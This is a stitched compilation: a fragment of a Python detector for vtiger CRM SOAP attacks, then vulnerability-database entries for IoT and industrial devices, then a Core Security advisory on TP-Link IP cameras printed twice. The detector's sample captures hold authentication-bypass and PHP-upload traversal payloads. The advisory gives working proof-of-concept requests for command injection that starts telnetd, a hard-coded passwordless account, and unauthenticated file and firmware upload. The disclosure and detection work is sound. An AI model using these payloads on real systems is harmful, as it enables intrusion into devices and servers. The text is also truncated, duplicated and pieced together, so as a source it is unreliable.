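SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CRM_NS = "http://www.vtiger.com/products/crm"
SESSION_PARAMS = ("session", "sessionid")          # parameter names used by the SOAP services
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path component
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php5")  # assumed list
MODULE_NAME = re.compile(r"[A-Za-z0-9]+")           # vtiger module names are plain words


def soap_method(body_xml: str):
    """Return (method name, {param: text}) for the first call in the SOAP body."""
    root = ET.fromstring(body_xml)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) == 0:
        return None, {}
    call = body[0]
    name = call.tag.split("}", 1)[-1]
    params = {child.tag.split("}", 1)[-1]: (child.text or "") for child in call}
    return name, params


def analyse_request(uri: str, body_xml: str) -> list:
    """Return findings for one captured request; an empty list means nothing matched."""
    if "/soap/" not in uri:
        return []
    try:
        method, params = soap_method(body_xml)
    except ET.ParseError:
        return ["unparseable SOAP body"]
    if method is None:
        return []
    findings = []
    # Empty or missing session: validateSession() compares a null server-side
    # value loosely, so "" (and an omitted element) authenticates any username.
    present = [p for p in SESSION_PARAMS if p in params]
    if not present:
        findings.append(f"{method}: no session parameter")
    for p in present:
        if params[p].strip() == "":
            findings.append(f"{method}: empty {p} (authentication bypass attempt)")
    # AddEmailAttachment writes <crmid>_<filename> under the storage directory as given.
    if method == "AddEmailAttachment":
        fname = params.get("filename", "")
        if TRAVERSAL.search(fname):
            findings.append(f"AddEmailAttachment: path traversal in filename {fname!r}")
        if fname.lower().endswith(PHP_EXTENSIONS) or params.get("filetype", "").lower() == "php":
            findings.append("AddEmailAttachment: PHP attachment")
    # customerportal.php does require_once('modules/'.$module.'/'.$module.'.php').
    if uri.endswith("customerportal.php") and method in ("get_list_values", "get_project_components"):
        module = params.get("module", "")
        if not MODULE_NAME.fullmatch(module):
            findings.append(f"{method}: suspicious module value {module!r}")
    return findings


def _envelope(method: str, params: dict) -> str:
    """Constructed SOAP body in the shape the vtiger endpoints accept."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in params.items())
    return (f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:crm="{CRM_NS}">'
            f"<soapenv:Header/><soapenv:Body><crm:{method}>{inner}</crm:{method}>"
            "</soapenv:Body></soapenv:Envelope>")


# Constructed captures, not real traffic: the first three mirror the exploit
# shapes on this page, the fourth is a normal call carrying a session value.
SAMPLE_CAPTURES = [
    ("/vtigercrm/soap/vtigerolservice.php", _envelope("AddEmailAttachment", {
        "emailid": "xkzq", "filedata": "PD9waHAgZWNobyAnaGknOyA/Pg==",
        "filename": "../../../../../../qmxrtz.php", "filesize": "19",
        "filetype": "php", "username": "pqwe", "session": ""})),
    ("/vtigercrm/soap/vtigerolservice.php", _envelope("CheckEmailPermission", {
        "username": "admin", "session": ""})),
    ("/vtigercrm/soap/customerportal.php", _envelope("get_list_values", {
        "id": "1", "module": "../../../../../../tmp/shell", "sessionid": "", "only_mine": "true"})),
    ("/vtigercrm/soap/vtigerolservice.php", _envelope("CheckEmailPermission", {
        "username": "admin", "session": "b1d4e5f6a7c8d9e0"})),
]


def scan(captures=SAMPLE_CAPTURES) -> list:
    """Findings per capture, in order."""
    return [analyse_request(uri, body) for uri, body in captures]


if __name__ == "__main__":
    for (uri, _), found in zip(SAMPLE_CAPTURES, scan()):
        print(uri, found or "clean")
```

The empty-session rule is the one worth keeping after patching: a legitimate client always sends the session value it was issued, so an empty session element on any vtiger SOAP call is a probe for this bypass regardless of which method follows it.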
VAR-201406-0070 CVE-2013-4860 Radio Thermostat CT80 And CT50 Remote Security Bypass Vulnerability
CVSS V2: 8.3
CVSS V3: -
Severity: HIGH
Radio Thermostat CT80 And CT50 with firmware 1.4.64 and earlier does not restrict access to the API, which allows remote attackers to change the operation mode, wifi connection settings, temperature thresholds, and other settings via unspecified vectors. The Radio Thermostat CT80 and CT50 are thermostats controlled over Wi-Fi; they manage heating and cooling systems in homes. An attacker may leverage this issue to bypass certain security restrictions and perform unauthorized actions. Radio Thermostat CT80 and CT50 running firmware 1.4.64 and prior are vulnerable.
VAR-201308-0266 CVE-2013-4911 Siemens SIMATIC WinCC TIA Portal Cross-Site Request Forgery Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to hijack the authentication of unspecified victims by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete supervisory control and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Siemens SIMATIC WinCC TIA Portal versions prior to 12 SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems. A remote attacker can exploit this vulnerability to hijack user authentication through incorrectly configured SIMATIC HMI panels of WinCC products
VAR-201308-0267 CVE-2013-4912 Siemens SIMATIC WinCC TIA Portal URL Redirection Vulnerability CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete supervisory control and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a remote URL-redirection vulnerability. An attacker can leverage this issue by constructing a URI that includes a malicious site redirection. When an unsuspecting victim follows the URI, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Siemens SIMATIC WinCC TIA Portal versions prior to 12 SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems
VAR-201308-0006 CVE-2012-3913 Cisco VC220 and VC240 cameras denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. Cisco VC220 and VC240 cameras contain a vulnerability that allows them to be put into a denial-of-service (WebUI outage) state. The vendor has confirmed this vulnerability and tracks it as Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A third party may cause a denial of service (WebUI outage) via a crafted packet. The Cisco VC220 and VC240 devices are network cameras. An unauthenticated remote attacker can send a specially crafted packet to the affected device, causing it to reload, which prevents the WebUI from being reached and denies service to legitimate users. These issues are being tracked by Cisco Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A remote attacker can exploit this vulnerability to cause a denial of service (WebUI interruption)
VAR-201308-0090 CVE-2013-3443 Cisco WAAS Software web service framework arbitrary code execution vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The web service framework in Cisco WAAS Software 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 in a Central Manager (CM) configuration allows remote attackers to execute arbitrary code via a crafted POST request, aka Bug ID CSCuh26626. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCuh26626. A third party may execute arbitrary code via a specially crafted POST request. Cisco Wide Area Application Services is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue is being tracked by Cisco bug ID CSCuh26626. This software is mainly used in WAN link environments with low bandwidth and high latency. Cisco WAAS Software 4.x, Cisco WAAS Software 5.x prior to 5.0.3e, Cisco WAAS Software 5.1.x prior to 5.1.1c, and Cisco WAAS Software 5.2.x prior to 5.2.1 are affected
VAR-201308-0091 CVE-2013-3444 Multiple Cisco products Web Framework arbitrary command execution vulnerability CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1; Cisco ACNS Software 4.x and 5.x before 5.5.29.2; Cisco ECDS Software 2.x before 2.5.6; Cisco CDS-IS Software 2.x before 2.6.3.b50 and 3.1.x before 3.1.2b54; Cisco VDS-IS Software 3.2.x before 3.2.1.b9; Cisco VDS-SB Software 1.x before 1.1.0-b96; Cisco VDS-OE Software 1.x before 1.0.1; and Cisco VDS-OS Software 1.x in central-management mode allows remote authenticated users to execute arbitrary commands by appending crafted strings to values in GUI fields, aka Bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. The Web Framework of multiple Cisco products, when running in central-management mode, contains a vulnerability that allows arbitrary command execution. The vendor has confirmed this vulnerability and tracks it as Bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. A remotely authenticated user may execute arbitrary commands by appending a specially crafted string to a GUI field value. Multiple Cisco Content Network and Video Delivery products are prone to a remote command-injection vulnerability because they fail to properly sanitize user-supplied input. Successfully exploiting this issue may allow an unprivileged attacker to execute arbitrary commands on the affected system and completely compromise the affected devices. This issue is being tracked by Cisco bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. Cisco Wide Area Application Services (WAAS) is a set of WAN link acceleration software from Cisco. This software is mainly used in WAN link environments with low bandwidth and high latency
VAR-201308-0352 CVE-2013-4652 Siemens Scalance W-700 Series Authentication Bypass Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in the command-line management interface on Siemens Scalance W7xx devices with firmware before 4.5.4 allows remote attackers to bypass authentication and execute arbitrary code via a (1) SSH or (2) TELNET connection. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware versions below v4.5.4 are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1; SCALANCE W744-1PRO, W746-1PRO, W747-1RR; SCALANCE W784-1, W784-1RR; SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR; SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and completely compromise an affected system. Siemens Scalance W-700 Series running firmware versions prior to 4.5.4 are vulnerable
VAR-201307-0210 CVE-2013-3425 Cisco WebEx Meeting Center component file enumeration vulnerability CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
The Meeting Center component in Cisco WebEx 11 generates different error messages for invalid file-access attempts depending on whether a file exists, which allows remote authenticated users to enumerate files via a series of SPI calls, aka Bug ID CSCuc35965. WebEx is prone to a remote security vulnerability. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM). There is a security vulnerability in the Meeting Center component of Cisco WebEx version 11.0. Attackers can use these differing error messages to enumerate files through a series of SPI calls
VAR-201308-0351 CVE-2013-4651 Siemens SCALANCE W700 series firmware SSL session man-in-the-middle vulnerability CVSS V2: 6.6
CVSS V3: -
Severity: MEDIUM
Siemens Scalance W7xx devices with firmware before 4.5.4 use the same hardcoded X.509 certificate across different customers' installations, which makes it easier for remote attackers to conduct man-in-the-middle attacks against SSL sessions by leveraging the certificate's trust relationship. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware versions below v4.5.4 are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1; SCALANCE W744-1PRO, W746-1PRO, W747-1RR; SCALANCE W784-1, W784-1RR; SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR; SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR. Attackers can exploit this issue to spoof a valid server and conduct man-in-the-middle attacks. Successful exploits will cause victims to accept the certificates assuming they are from a legitimate site. Siemens Scalance W-700 series running firmware versions prior to 4.5.4 are vulnerable
VAR-201310-0194 CVE-2013-2578 Multiple TP-Link IP Camera products cgi-bin/admin/servetest arbitrary command execution vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
cgi-bin/admin/servetest in TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the ServerName parameter and (2) other unspecified parameters. The TP-Link TL-SC3171 IP camera is a webcam device. TP-Link TL-SC3171 IP Cameras are prone to multiple remote command-injection vulnerabilities. Attackers may exploit these issues to execute arbitrary commands with root privileges in the context of the affected device. TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. There is a command injection vulnerability in the cgi-bin/admin/servetest file in versions earlier than LM.1.6.18P12_sign6 of TP-LINK IP Cameras. The following models are affected: TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras

1. *Advisory Information*

Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78], Use of hard-coded credentials [CWE-798], Authentication Bypass Issues [CWE-592], Missing Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581

3. *Vulnerability Description*

Multiple vulnerabilities have been found in TP-Link TL-SC3171 [1] IP camera running firmware version LM.1.6.18P12_sign5 that could allow an attacker:

1. [CVE-2013-2578] to execute arbitrary commands through the file '/cgi-bin/admin/servetest'.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using hard-coded credentials.
3. [CVE-2013-2580] to perform unauthenticated remote file uploads.
4. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades.

3.1. *Attack Paths*

There are several attack paths that can be exploited by combining these vulnerabilities with other ones discovered by Eliezer Varade Lopez, Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack paths are available, but the ones listed here allow understanding how an attacker could compromise the affected device.

3.1.1. *Attack Path I* (Authentication: none)

1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot' [2].

3.1.2. *Attack Path II* (Authentication: bypassed)

1. Reset the device to its factory defaults exploiting 'http://<ip-cam>/cgi-bin/hardfactorydefault' [2]. After this step, the authentication can be bypassed by using 'admin:admin' as a valid 'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot' [2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Log in to the Telnet service using user 'qmik' (no password) [CVE-2013-2579], and use the device as a pivoting point.

4. *Vulnerable Packages*

Tests and PoC were run on:

5. *Vendor Information, Solutions and Workarounds*

Vendor provides the links to (pre-release) patched firmware versions [3]. The final official versions will be released in the next few days. Please, contact TP-Link for further information.

6. *Credits*

These vulnerabilities were discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *OS Command Injection in servetest* [CVE-2013-2578]

The file '/cgi-bin/admin/servetest' has an OS command injection in several of its parameters that can be exploited by an authenticated user to execute arbitrary commands. The following proof of concept starts the telnetd service:

/-----
GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/

7.2. *Hard-coded credentials in telnet service* [CVE-2013-2579]

The affected system includes a hard-coded login with no password which could be used by a remote attacker to access the OS of the affected device using the built-in telnet service:

/-----
username: qmik
password: (none)
-----/

The 'qmik' user is allowed to execute the command 'su', allowing the user to execute arbitrary commands with root level privileges. The telnet service can be enabled through [CVE-2013-2578].

7.3. *Unauthenticated remote file uploads* [CVE-2013-2580]

The file '/cgi-bin/uploadfile' allows an unauthenticated user to perform remote file uploads as shown in the following Python PoC:

/-----
import requests

fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
              files={fileName: open(fileName, "rb")})
-----/

The uploaded file (in this example lala.tmp) will be hosted in the '/mnt/mtd' directory.

7.4. *Unauthenticated remote firmware upgrades* [CVE-2013-2581]

The file '/cgi-bin/firmwareupgrade' allows an unauthenticated user to perform remote firmware upgrades as shown in the following Python PoC:

/-----
import requests

requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies = {"VideoFmt": "1"}
requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
              files={"SetFWFileName": (fileName, open(fileName, "rb"))},
              cookies=cookies)
-----/

8. *Report Timeline*

2013-06-12: Core Security Technologies notifies the TP-Link team of the vulnerability.
2013-06-18: Core Security Technologies notifies the TP-Link team of the vulnerability and sets the estimated publication date of the advisory for July 10, 2013.
2013-06-19: TP-Link answers saying that these vulnerabilities are the same as the ones published on May 28, 2013.
2013-06-26: Core Security Technologies notifies the TP-Link team that these are new, different, vulnerabilities and sends a draft report with technical information.
2013-06-26: Vendor acknowledges the receipt of the technical report.
2013-07-01: Vendor requests additional technical information.
2013-07-04: Core re-sends an improved technical report with additional information regarding possible attack paths [Sec. 3.1].
2013-07-10: First release date missed.
2013-07-15: Core asks for a status update.
2013-07-22: Vendor notifies that a patched firmware version will be released on July 29th.
2013-07-22: Core re-schedules the advisory publication for July 29th.
2013-07-26: Vendor notifies that a (pre-release) patched firmware version is available [3] and being tested.
2013-07-30: Advisory CORE-2013-0618 is published.

9. *References*

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.
[3] See the online version, http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201310-0195 CVE-2013-2579 TP-Link TL-SC3171 IP Camera Remote Command Injection Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 have an empty password for the hardcoded "qmik" account, which allows remote attackers to obtain administrative access via a TELNET session. The TP-Link TL-SC3171 IP camera is a webcam device. TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. The vulnerability comes from the fact that the program sets the hard-coded 'qmik' account with an empty password. A remote attacker can exploit this vulnerability through a TELNET session to gain administrator privileges.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras

1. *Advisory Information*

Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras
Advisory ID: CORE-2013-0618
Advisory URL: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Date published: 2013-07-30
Date of last update: 2013-07-30
Vendors contacted: TP-Link
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78], Use of hard-coded credentials [CWE-798], Authentication Bypass Issues [CWE-592], Missing Authentication for Critical Function [CWE-306]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581

3. *Vulnerability Description*

Multiple vulnerabilities have been found in TP-Link TL-SC3171 [1] IP camera running firmware version LM.1.6.18P12_sign5 that could allow an attacker:

1. [CVE-2013-2578] to execute arbitrary commands through the file '/cgi-bin/admin/servetest'.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using hard-coded credentials.
3. [CVE-2013-2580] to perform unauthenticated remote file uploads.
4. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades.

3.1. *Attack Paths*

There are several attack paths that can be exploited by combining these vulnerabilities with other ones discovered by Eliezer Varade Lopez, Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack paths are available, but the ones listed here allow understanding how an attacker could compromise the affected device.

3.1.1. *Attack Path I* (Authentication: none)

1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot' [2].

3.1.2. *Attack Path II* (Authentication: bypassed)

1. Reset the device to its factory defaults exploiting 'http://<ip-cam>/cgi-bin/hardfactorydefault' [2]. After this step, the authentication can be bypassed by using 'admin:admin' as a valid 'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot' [2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Log in to the Telnet service using user 'qmik' (no password) [CVE-2013-2579], and use the device as a pivoting point.

4. *Vulnerable Packages*

Tests and PoC were run on:

5. *Vendor Information, Solutions and Workarounds*

Vendor provides the links to (pre-release) patched firmware versions [3]. The final official versions will be released in the next few days. Please, contact TP-Link for further information.

6. *Credits*

These vulnerabilities were discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *OS Command Injection in servetest* [CVE-2013-2578]

The file '/cgi-bin/admin/servetest' has an OS command injection in several of its parameters that can be exploited by an authenticated user to execute arbitrary commands. The following proof of concept starts the telnetd service:

/-----
GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/

7.2. *Hard-coded credentials in telnet service* [CVE-2013-2579]

The affected system includes a hard-coded login with no password which could be used by a remote attacker to access the OS of the affected device using the built-in telnet service:

/-----
username: qmik
password: (none)
-----/

The 'qmik' user is allowed to execute the command 'su', allowing the user to execute arbitrary commands with root level privileges. The telnet service can be enabled through [CVE-2013-2578].

7.3. *Unauthenticated remote file uploads* [CVE-2013-2580]

The file '/cgi-bin/uploadfile' allows an unauthenticated user to perform remote file uploads as shown in the following Python PoC:

/-----
import requests

fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
              files={fileName: open(fileName, "rb")})
-----/

The uploaded file (in this example lala.tmp) will be hosted in the '/mnt/mtd' directory.

7.4. *Unauthenticated remote firmware upgrades* [CVE-2013-2581]

The file '/cgi-bin/firmwareupgrade' allows an unauthenticated user to perform remote firmware upgrades as shown in the following Python PoC:

/-----
import requests

requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies = {"VideoFmt": "1"}
requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset",
              files={"SetFWFileName": (fileName, open(fileName, "rb"))},
              cookies=cookies)
-----/

8. *Report Timeline*

2013-06-12: Core Security Technologies notifies the TP-Link team of the vulnerability.
2013-06-18: Core Security Technologies notifies the TP-Link team of the vulnerability and sets the estimated publication date of the advisory for July 10, 2013.
2013-06-19: TP-Link answers saying that these vulnerabilities are the same as the ones published on May 28, 2013.
2013-06-26: Core Security Technologies notifies the TP-Link team that these are new, different, vulnerabilities and sends a draft report with technical information.
2013-06-26: Vendor acknowledges the receipt of the technical report.
2013-07-01: Vendor requests additional technical information.
2013-07-04: Core re-sends an improved technical report with additional information regarding possible attack paths [Sec. 3.1].
2013-07-10: First release date missed.
2013-07-15: Core asks for a status update.
2013-07-22: Vendor notifies that a patched firmware version will be released on July 29th.
2013-07-22: Core re-schedules the advisory publication for July 29th.
2013-07-26: Vendor notifies that a (pre-release) patched firmware version is available [3] and being tested.
2013-07-30: Advisory CORE-2013-0618 is published.

9. *References*

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.
[3] See the online version, http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc